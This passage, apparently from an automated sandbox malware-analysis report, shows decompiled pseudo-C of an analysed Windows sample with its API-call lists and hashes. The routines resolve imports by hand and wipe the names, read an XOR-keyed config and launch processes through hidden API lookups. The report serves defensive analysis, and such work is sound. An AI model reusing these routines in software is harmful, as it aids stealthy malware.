                                                                                                                                                                                              				_Unknown_base(*)()* _v24;
                                                                                                                                                                                              				intOrPtr _t34;
                                                                                                                                                                                              				intOrPtr _t36;
                                                                                                                                                                                              				struct HINSTANCE__* _t37;
                                                                                                                                                                                              				intOrPtr _t40;
                                                                                                                                                                                              				CHAR* _t44;
                                                                                                                                                                                              				_Unknown_base(*)()* _t45;
                                                                                                                                                                                              				intOrPtr* _t52;
                                                                                                                                                                                              				intOrPtr _t53;
                                                                                                                                                                                              				signed short _t54;
                                                                                                                                                                                              				intOrPtr* _t57;
                                                                                                                                                                                              				signed short _t59;
                                                                                                                                                                                              				CHAR* _t60;
                                                                                                                                                                                              				CHAR* _t62;
                                                                                                                                                                                              				signed short* _t64;
                                                                                                                                                                                              				void* _t65;
                                                                                                                                                                                              				signed short _t72;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t34 =  *((intOrPtr*)(_a8 + 0x80));
                                                                                                                                                                                              				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                              				_t52 = _a4;
                                                                                                                                                                                              				if(_t34 == 0) {
                                                                                                                                                                                              					L28:
                                                                                                                                                                                              					return _v8;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t57 = _t34 + _t52;
                                                                                                                                                                                              				_t36 =  *((intOrPtr*)(_t57 + 0xc));
                                                                                                                                                                                              				_a4 = _t57;
                                                                                                                                                                                              				if(_t36 == 0) {
                                                                                                                                                                                              					L27:
                                                                                                                                                                                              					goto L28;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                              					_t62 = _t36 + _t52;
                                                                                                                                                                                              					_t37 = LoadLibraryA(_t62);
                                                                                                                                                                                              					_v16 = _t37;
                                                                                                                                                                                              					if(_t37 == 0) {
                                                                                                                                                                                              						break;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_v12 = _v12 & 0x00000000;
                                                                                                                                                                                              					memset(_t62, 0, lstrlenA(_t62));
                                                                                                                                                                                              					_t53 =  *_t57;
                                                                                                                                                                                              					_t40 =  *((intOrPtr*)(_t57 + 0x10));
                                                                                                                                                                                              					_t65 = _t65 + 0xc;
                                                                                                                                                                                              					if(_t53 != 0) {
                                                                                                                                                                                              						L6:
                                                                                                                                                                                              						_t64 = _t53 + _t52;
                                                                                                                                                                                              						_t54 =  *_t64;
                                                                                                                                                                                              						if(_t54 == 0) {
                                                                                                                                                                                              							L23:
                                                                                                                                                                                              							_t36 =  *((intOrPtr*)(_t57 + 0x20));
                                                                                                                                                                                              							_t57 = _t57 + 0x14;
                                                                                                                                                                                              							_a4 = _t57;
                                                                                                                                                                                              							if(_t36 != 0) {
                                                                                                                                                                                              								continue;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							L26:
                                                                                                                                                                                              							goto L27;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_v20 = _t40 - _t64 + _t52;
                                                                                                                                                                                              						_t72 = _t54;
                                                                                                                                                                                              						L8:
                                                                                                                                                                                              						L8:
                                                                                                                                                                                              						if(_t72 < 0) {
                                                                                                                                                                                              							if(_t54 < _t52 || _t54 >=  *((intOrPtr*)(_a8 + 0x50)) + _t52) {
                                                                                                                                                                                              								_t59 = 0;
                                                                                                                                                                                              								_v12 =  *_t64 & 0x0000ffff;
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								_t59 = _t54;
                                                                                                                                                                                              							}
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							_t59 = _t54 + _t52;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t20 = _t59 + 2; // 0x2
                                                                                                                                                                                              						_t44 = _t20;
                                                                                                                                                                                              						if(_t59 == 0) {
                                                                                                                                                                                              							_t44 = _v12 & 0x0000ffff;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t45 = GetProcAddress(_v16, _t44);
                                                                                                                                                                                              						_v24 = _t45;
                                                                                                                                                                                              						if(_t45 == 0) {
                                                                                                                                                                                              							goto L21;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						if(_t59 != 0) {
                                                                                                                                                                                              							_t60 = _t59 + 2;
                                                                                                                                                                                              							memset(_t60, 0, lstrlenA(_t60));
                                                                                                                                                                                              							_t65 = _t65 + 0xc;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						 *(_v20 + _t64) = _v24;
                                                                                                                                                                                              						_t64 =  &(_t64[2]);
                                                                                                                                                                                              						_t54 =  *_t64;
                                                                                                                                                                                              						if(_t54 != 0) {
                                                                                                                                                                                              							goto L8;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							L22:
                                                                                                                                                                                              							_t57 = _a4;
                                                                                                                                                                                              							goto L23;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						L21:
                                                                                                                                                                                              						_v8 = 0x7f;
                                                                                                                                                                                              						goto L22;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t53 = _t40;
                                                                                                                                                                                              					if(_t40 == 0) {
                                                                                                                                                                                              						goto L23;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					goto L6;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_v8 = 0x7e;
                                                                                                                                                                                              				goto L26;
                                                                                                                                                                                              			}
























                                                                                                                                                                                              0x00a815cb
                                                                                                                                                                                              0x00a815d1
                                                                                                                                                                                              0x00a815d6
                                                                                                                                                                                              0x00a815db
                                                                                                                                                                                              0x00a816dc
                                                                                                                                                                                              0x00a816e1
                                                                                                                                                                                              0x00a816e1
                                                                                                                                                                                              0x00a815e2
                                                                                                                                                                                              0x00a815e5
                                                                                                                                                                                              0x00a815e8
                                                                                                                                                                                              0x00a815ed
                                                                                                                                                                                              0x00a816db
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a816db
                                                                                                                                                                                              0x00a815f4
                                                                                                                                                                                              0x00a815f4
                                                                                                                                                                                              0x00a815f8
                                                                                                                                                                                              0x00a815fe
                                                                                                                                                                                              0x00a81603
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a81609
                                                                                                                                                                                              0x00a81618
                                                                                                                                                                                              0x00a8161d
                                                                                                                                                                                              0x00a8161f
                                                                                                                                                                                              0x00a81622
                                                                                                                                                                                              0x00a81627
                                                                                                                                                                                              0x00a81633
                                                                                                                                                                                              0x00a81633
                                                                                                                                                                                              0x00a81636
                                                                                                                                                                                              0x00a8163a
                                                                                                                                                                                              0x00a816c0
                                                                                                                                                                                              0x00a816c0
                                                                                                                                                                                              0x00a816c3
                                                                                                                                                                                              0x00a816c6
                                                                                                                                                                                              0x00a816cb
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a816da
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a816da
                                                                                                                                                                                              0x00a81644
                                                                                                                                                                                              0x00a81647
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a81649
                                                                                                                                                                                              0x00a81649
                                                                                                                                                                                              0x00a81652
                                                                                                                                                                                              0x00a81667
                                                                                                                                                                                              0x00a81669
                                                                                                                                                                                              0x00a81660
                                                                                                                                                                                              0x00a81660
                                                                                                                                                                                              0x00a81660
                                                                                                                                                                                              0x00a8164b
                                                                                                                                                                                              0x00a8164b
                                                                                                                                                                                              0x00a8164b
                                                                                                                                                                                              0x00a8166c
                                                                                                                                                                                              0x00a8166c
                                                                                                                                                                                              0x00a81671
                                                                                                                                                                                              0x00a81673
                                                                                                                                                                                              0x00a81673
                                                                                                                                                                                              0x00a8167b
                                                                                                                                                                                              0x00a81681
                                                                                                                                                                                              0x00a81686
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a8168a
                                                                                                                                                                                              0x00a8168c
                                                                                                                                                                                              0x00a8169a
                                                                                                                                                                                              0x00a8169f
                                                                                                                                                                                              0x00a8169f
                                                                                                                                                                                              0x00a816a8
                                                                                                                                                                                              0x00a816ab
                                                                                                                                                                                              0x00a816ae
                                                                                                                                                                                              0x00a816b2
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a816b4
                                                                                                                                                                                              0x00a816bd
                                                                                                                                                                                              0x00a816bd
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a816bd
                                                                                                                                                                                              0x00a816b6
                                                                                                                                                                                              0x00a816b6
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a816b6
                                                                                                                                                                                              0x00a81629
                                                                                                                                                                                              0x00a8162d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a8162d
                                                                                                                                                                                              0x00a816d3
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,00000002), ref: 00A815F8
                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00A8160E
                                                                                                                                                                                              • memset.NTDLL ref: 00A81618
                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00000002), ref: 00A8167B
                                                                                                                                                                                              • lstrlenA.KERNEL32(-00000002), ref: 00A81690
                                                                                                                                                                                              • memset.NTDLL ref: 00A8169A
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.612932571.0000000000A80000.00000040.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.612964625.0000000000A85000.00000040.00020000.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.612984516.0000000000A87000.00000040.00020000.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: lstrlenmemset$AddressLibraryLoadProc
                                                                                                                                                                                              • String ID: ~
                                                                                                                                                                                              • API String ID: 1986585659-1707062198
                                                                                                                                                                                              • Opcode ID: 2b2de4ff2be5d5fbda0f0d5218a8778a84ebab522e85ee855cb02d003196a1ce
                                                                                                                                                                                              • Instruction ID: 8c03b0aadd4ef2e693674a56a17f29f1e8789539f290624211c5bc998ce451e4
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2b2de4ff2be5d5fbda0f0d5218a8778a84ebab522e85ee855cb02d003196a1ce
                                                                                                                                                                                              • Instruction Fuzzy Hash: 713162B6A01206EBDF14EF55C890BAEB7B8BF44744F254139E845EB240E730EA43CB50
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 73%
                                                                                                                                                                                              			E00DF1493(void* __eax, void* __ecx) {
                                                                                                                                                                                              				long _v8;
                                                                                                                                                                                              				void* _v12;
                                                                                                                                                                                              				void* _v16;
                                                                                                                                                                                              				void* _v28;
                                                                                                                                                                                              				long _v32;
                                                                                                                                                                                              				void _v104;
                                                                                                                                                                                              				char _v108;
                                                                                                                                                                                              				long _t36;
                                                                                                                                                                                              				intOrPtr _t39;
                                                                                                                                                                                              				intOrPtr _t46;
                                                                                                                                                                                              				intOrPtr _t49;
                                                                                                                                                                                              				void* _t57;
                                                                                                                                                                                              				void* _t66;
                                                                                                                                                                                              				intOrPtr _t67;
                                                                                                                                                                                              				intOrPtr* _t68;
                                                                                                                                                                                              				intOrPtr* _t69;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t1 = __eax + 0x14; // 0x74183966
                                                                                                                                                                                              				_t67 =  *_t1;
                                                                                                                                                                                              				_t36 = E00DF57D8(__ecx,  *(_t67 + 0xc),  &_v12,  &_v16);
                                                                                                                                                                                              				_v8 = _t36;
                                                                                                                                                                                              				if(_t36 != 0) {
                                                                                                                                                                                              					L12:
                                                                                                                                                                                              					return _v8;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				memcpy(_v12,  *(_t67 + 8),  *(_t67 + 0xc));
                                                                                                                                                                                              				_t39 = _v12(_v12);
                                                                                                                                                                                              				_v8 = _t39;
                                                                                                                                                                                              				if(_t39 == 0 && ( *0xdfd260 & 0x00000001) != 0) {
                                                                                                                                                                                              					_v32 = 0;
                                                                                                                                                                                              					asm("stosd");
                                                                                                                                                                                              					asm("stosd");
                                                                                                                                                                                              					asm("stosd");
                                                                                                                                                                                              					_v108 = 0;
                                                                                                                                                                                              					memset( &_v104, 0, 0x40);
                                                                                                                                                                                              					_t46 =  *0xdfd2a4; // 0x3e0a5a8
                                                                                                                                                                                              					_t18 = _t46 + 0xdfe3e6; // 0x73797325
                                                                                                                                                                                              					_t66 = E00DF77E6(_t18);
                                                                                                                                                                                              					if(_t66 == 0) {
                                                                                                                                                                                              						_v8 = 8;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_t49 =  *0xdfd2a4; // 0x3e0a5a8
                                                                                                                                                                                              						_t19 = _t49 + 0xdfe747; // 0x4c08cef
                                                                                                                                                                                              						_t20 = _t49 + 0xdfe0af; // 0x4e52454b
                                                                                                                                                                                              						_t69 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                                                                                                                                                                                              						if(_t69 == 0) {
                                                                                                                                                                                              							_v8 = 0x7f;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							_v108 = 0x44;
                                                                                                                                                                                              							E00DF684E();
                                                                                                                                                                                              							_t57 =  *_t69(0, _t66, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                                                                                                                                                                                              							_push(1);
                                                                                                                                                                                              							E00DF684E();
                                                                                                                                                                                              							if(_t57 == 0) {
                                                                                                                                                                                              								_v8 = GetLastError();
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								CloseHandle(_v28);
                                                                                                                                                                                              								CloseHandle(_v32);
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              						HeapFree( *0xdfd238, 0, _t66);
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t68 = _v16;
                                                                                                                                                                                              				 *((intOrPtr*)(_t68 + 0x18))( *((intOrPtr*)(_t68 + 0x1c))( *_t68));
                                                                                                                                                                                              				E00DF147E(_t68);
                                                                                                                                                                                              				goto L12;
                                                                                                                                                                                              			}



















                                                                                                                                                                                              0x00df149b
                                                                                                                                                                                              0x00df149b
                                                                                                                                                                                              0x00df14aa
                                                                                                                                                                                              0x00df14b1
                                                                                                                                                                                              0x00df14b6
                                                                                                                                                                                              0x00df15c6
                                                                                                                                                                                              0x00df15cd
                                                                                                                                                                                              0x00df15cd
                                                                                                                                                                                              0x00df14c5
                                                                                                                                                                                              0x00df14d0
                                                                                                                                                                                              0x00df14d3
                                                                                                                                                                                              0x00df14d8
                                                                                                                                                                                              0x00df14ed
                                                                                                                                                                                              0x00df14f3
                                                                                                                                                                                              0x00df14f4
                                                                                                                                                                                              0x00df14f7
                                                                                                                                                                                              0x00df14fd
                                                                                                                                                                                              0x00df1500
                                                                                                                                                                                              0x00df1505
                                                                                                                                                                                              0x00df150d
                                                                                                                                                                                              0x00df1519
                                                                                                                                                                                              0x00df151d
                                                                                                                                                                                              0x00df15ad
                                                                                                                                                                                              0x00df1523
                                                                                                                                                                                              0x00df1523
                                                                                                                                                                                              0x00df1528
                                                                                                                                                                                              0x00df152f
                                                                                                                                                                                              0x00df1543
                                                                                                                                                                                              0x00df1547
                                                                                                                                                                                              0x00df1596
                                                                                                                                                                                              0x00df1549
                                                                                                                                                                                              0x00df154a
                                                                                                                                                                                              0x00df1551
                                                                                                                                                                                              0x00df156a
                                                                                                                                                                                              0x00df156c
                                                                                                                                                                                              0x00df1570
                                                                                                                                                                                              0x00df1577
                                                                                                                                                                                              0x00df1591
                                                                                                                                                                                              0x00df1579
                                                                                                                                                                                              0x00df1582
                                                                                                                                                                                              0x00df1587
                                                                                                                                                                                              0x00df1587
                                                                                                                                                                                              0x00df1577
                                                                                                                                                                                              0x00df15a5
                                                                                                                                                                                              0x00df15a5
                                                                                                                                                                                              0x00df151d
                                                                                                                                                                                              0x00df15b4
                                                                                                                                                                                              0x00df15bd
                                                                                                                                                                                              0x00df15c1
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00DF57D8: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,00DF14AF,?,?,?,?,00000000,00000000), ref: 00DF57FD
                                                                                                                                                                                                • Part of subcall function 00DF57D8: GetProcAddress.KERNEL32(00000000,7243775A), ref: 00DF581F
                                                                                                                                                                                                • Part of subcall function 00DF57D8: GetProcAddress.KERNEL32(00000000,614D775A), ref: 00DF5835
                                                                                                                                                                                                • Part of subcall function 00DF57D8: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00DF584B
                                                                                                                                                                                                • Part of subcall function 00DF57D8: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00DF5861
                                                                                                                                                                                                • Part of subcall function 00DF57D8: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00DF5877
                                                                                                                                                                                              • memcpy.NTDLL(?,?,?,?,?,?,?,00000000,00000000), ref: 00DF14C5
                                                                                                                                                                                              • memset.NTDLL ref: 00DF1500
                                                                                                                                                                                                • Part of subcall function 00DF77E6: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,59935A4D,00DF333A,73797325), ref: 00DF77F7
                                                                                                                                                                                                • Part of subcall function 00DF77E6: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00DF7811
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(4E52454B,04C08CEF,73797325), ref: 00DF1536
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00DF153D
                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000), ref: 00DF15A5
                                                                                                                                                                                                • Part of subcall function 00DF684E: GetProcAddress.KERNEL32(36776F57,00DF935F), ref: 00DF6869
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000001), ref: 00DF1582
                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00DF1587
                                                                                                                                                                                              • GetLastError.KERNEL32(00000001), ref: 00DF158B
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemcpymemset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 478747673-0
                                                                                                                                                                                              • Opcode ID: 51e7d6f44a0228746533d91c8029070514368542cb9c9d7ee5b9f796a9649e6c
                                                                                                                                                                                              • Instruction ID: 58506a33c4789a406db62d717e20405a947c30c18967fac18484e565bee83235
                                                                                                                                                                                              • Opcode Fuzzy Hash: 51e7d6f44a0228746533d91c8029070514368542cb9c9d7ee5b9f796a9649e6c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D3141B680020CFFDB10AFA4DC89DBEBBBDEB48344F158565E606E7221D6359A44DB70
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 63%
                                                                                                                                                                                              			E00DF4D2C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                                                              				intOrPtr _t9;
                                                                                                                                                                                              				intOrPtr _t13;
                                                                                                                                                                                              				char* _t28;
                                                                                                                                                                                              				void* _t33;
                                                                                                                                                                                              				void* _t34;
                                                                                                                                                                                              				char* _t36;
                                                                                                                                                                                              				intOrPtr* _t40;
                                                                                                                                                                                              				char* _t41;
                                                                                                                                                                                              				char* _t42;
                                                                                                                                                                                              				char* _t43;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t34 = __edx;
                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                              				_t9 =  *0xdfd2a4; // 0x3e0a5a8
                                                                                                                                                                                              				_t1 = _t9 + 0xdfe62c; // 0x253d7325
                                                                                                                                                                                              				_t36 = 0;
                                                                                                                                                                                              				_t28 = E00DF6027(__ecx, _t1);
                                                                                                                                                                                              				if(_t28 != 0) {
                                                                                                                                                                                              					_t40 = __imp__;
                                                                                                                                                                                              					_t13 =  *_t40(_t28);
                                                                                                                                                                                              					_v8 = _t13;
                                                                                                                                                                                              					_t41 = E00DF58BE(_v8 +  *_t40(_a4) + 1);
                                                                                                                                                                                              					if(_t41 != 0) {
                                                                                                                                                                                              						strcpy(_t41, _t28);
                                                                                                                                                                                              						_pop(_t33);
                                                                                                                                                                                              						__imp__(_t41, _a4);
                                                                                                                                                                                              						_t36 = E00DF6F33(_t34, _t41, _a8);
                                                                                                                                                                                              						E00DF147E(_t41);
                                                                                                                                                                                              						_t42 = E00DF4759(StrTrimA(_t36, "="), _t36);
                                                                                                                                                                                              						if(_t42 != 0) {
                                                                                                                                                                                              							E00DF147E(_t36);
                                                                                                                                                                                              							_t36 = _t42;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t43 = E00DF4858(_t36, _t33);
                                                                                                                                                                                              						if(_t43 != 0) {
                                                                                                                                                                                              							E00DF147E(_t36);
                                                                                                                                                                                              							_t36 = _t43;
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              					E00DF147E(_t28);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t36;
                                                                                                                                                                                              			}














                                                                                                                                                                                              0x00df4d2c
                                                                                                                                                                                              0x00df4d2f
                                                                                                                                                                                              0x00df4d30
                                                                                                                                                                                              0x00df4d38
                                                                                                                                                                                              0x00df4d3f
                                                                                                                                                                                              0x00df4d46
                                                                                                                                                                                              0x00df4d4a
                                                                                                                                                                                              0x00df4d50
                                                                                                                                                                                              0x00df4d57
                                                                                                                                                                                              0x00df4d5c
                                                                                                                                                                                              0x00df4d6e
                                                                                                                                                                                              0x00df4d72
                                                                                                                                                                                              0x00df4d76
                                                                                                                                                                                              0x00df4d7c
                                                                                                                                                                                              0x00df4d81
                                                                                                                                                                                              0x00df4d91
                                                                                                                                                                                              0x00df4d93
                                                                                                                                                                                              0x00df4daa
                                                                                                                                                                                              0x00df4dae
                                                                                                                                                                                              0x00df4db1
                                                                                                                                                                                              0x00df4db6
                                                                                                                                                                                              0x00df4db6
                                                                                                                                                                                              0x00df4dbf
                                                                                                                                                                                              0x00df4dc3
                                                                                                                                                                                              0x00df4dc6
                                                                                                                                                                                              0x00df4dcb
                                                                                                                                                                                              0x00df4dcb
                                                                                                                                                                                              0x00df4dc3
                                                                                                                                                                                              0x00df4dce
                                                                                                                                                                                              0x00df4dce
                                                                                                                                                                                              0x00df4dd9

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00DF6027: lstrlen.KERNEL32(00000000,00000000,00000000,7742C740,?,?,?,00DF4D46,253D7325,00000000,00000000,7742C740,?,?,00DF52FE,?), ref: 00DF608E
                                                                                                                                                                                                • Part of subcall function 00DF6027: sprintf.NTDLL ref: 00DF60AF
                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,00DF52FE,?,04C095B0), ref: 00DF4D57
                                                                                                                                                                                              • lstrlen.KERNEL32(?,?,?,00DF52FE,?,04C095B0), ref: 00DF4D5F
                                                                                                                                                                                                • Part of subcall function 00DF58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,00DF1C51), ref: 00DF58CA
                                                                                                                                                                                              • strcpy.NTDLL ref: 00DF4D76
                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,?), ref: 00DF4D81
                                                                                                                                                                                                • Part of subcall function 00DF6F33: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,00DF4D90,00000000,?,?,?,00DF52FE,?,04C095B0), ref: 00DF6F4A
                                                                                                                                                                                                • Part of subcall function 00DF147E: HeapFree.KERNEL32(00000000,00000000,00DF1D11,00000000,?,?,-00000008), ref: 00DF148A
                                                                                                                                                                                              • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00DF52FE,?,04C095B0), ref: 00DF4D9E
                                                                                                                                                                                                • Part of subcall function 00DF4759: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,00DF4DAA,00000000,?,?,00DF52FE,?,04C095B0), ref: 00DF4763
                                                                                                                                                                                                • Part of subcall function 00DF4759: _snprintf.NTDLL ref: 00DF47C1
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                                                                                                                                                              • String ID: =
                                                                                                                                                                                              • API String ID: 2864389247-1428090586
                                                                                                                                                                                              • Opcode ID: 6d0f4934f074709bd947703c177db01a5360aa0dff9e879dcc6eb5bb6f8d6994
                                                                                                                                                                                              • Instruction ID: db9ed1e779c68e245180a69b78965aeea399febc8d86af1b9719d6f7fa4177c3
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6d0f4934f074709bd947703c177db01a5360aa0dff9e879dcc6eb5bb6f8d6994
                                                                                                                                                                                              • Instruction Fuzzy Hash: 59115177A0122DA746227BA8AD45C7F3AADDE857A430BC155FB04EB211DE34DD0297F0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                                                              			E00DF98F7(void* __ebx, int* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                              				int _v8;
                                                                                                                                                                                              				void* _v12;
                                                                                                                                                                                              				signed int _t18;
                                                                                                                                                                                              				signed int _t23;
                                                                                                                                                                                              				void* _t28;
                                                                                                                                                                                              				char* _t29;
                                                                                                                                                                                              				char* _t30;
                                                                                                                                                                                              				char* _t31;
                                                                                                                                                                                              				char* _t32;
                                                                                                                                                                                              				char* _t33;
                                                                                                                                                                                              				void* _t34;
                                                                                                                                                                                              				void* _t35;
                                                                                                                                                                                              				signed int _t41;
                                                                                                                                                                                              				void* _t43;
                                                                                                                                                                                              				void* _t44;
                                                                                                                                                                                              				signed int _t46;
                                                                                                                                                                                              				signed int _t50;
                                                                                                                                                                                              				signed int _t54;
                                                                                                                                                                                              				signed int _t58;
                                                                                                                                                                                              				signed int _t62;
                                                                                                                                                                                              				signed int _t66;
                                                                                                                                                                                              				void* _t69;
                                                                                                                                                                                              				void* _t70;
                                                                                                                                                                                              				void* _t80;
                                                                                                                                                                                              				void* _t83;
                                                                                                                                                                                              				intOrPtr _t86;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t83 = __esi;
                                                                                                                                                                                              				_t80 = __edi;
                                                                                                                                                                                              				_t72 = __ecx;
                                                                                                                                                                                              				_t69 = __ebx;
                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                              				_t18 =  *0xdfd2a0; // 0x59935a40
                                                                                                                                                                                              				if(E00DF96D5( &_v12,  &_v8, _t18 ^ 0xb8bb0424) != 0 && _v8 >= 0x90) {
                                                                                                                                                                                              					 *0xdfd2d0 = _v12;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t23 =  *0xdfd2a0; // 0x59935a40
                                                                                                                                                                                              				if(E00DF96D5( &_v12,  &_v8, _t23 ^ 0xd62287a1) == 0) {
                                                                                                                                                                                              					_t28 = 2;
                                                                                                                                                                                              					return _t28;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_push(_t69);
                                                                                                                                                                                              					_t70 = _v12;
                                                                                                                                                                                              					_push(_t83);
                                                                                                                                                                                              					_push(_t80);
                                                                                                                                                                                              					if(_t70 == 0) {
                                                                                                                                                                                              						_t29 = 0;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_t66 =  *0xdfd2a0; // 0x59935a40
                                                                                                                                                                                              						_t29 = E00DF10CA(_t72, _t70, _t66 ^ 0x48b4463f);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					if(_t29 != 0) {
                                                                                                                                                                                              						_t72 =  &_v8;
                                                                                                                                                                                              						if(StrToIntExA(_t29, 0,  &_v8) != 0) {
                                                                                                                                                                                              							 *0xdfd240 = _v8;
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              					if(_t70 == 0) {
                                                                                                                                                                                              						_t30 = 0;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_t62 =  *0xdfd2a0; // 0x59935a40
                                                                                                                                                                                              						_t30 = E00DF10CA(_t72, _t70, _t62 ^ 0x11ba0dc3);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					if(_t30 != 0) {
                                                                                                                                                                                              						_t72 =  &_v8;
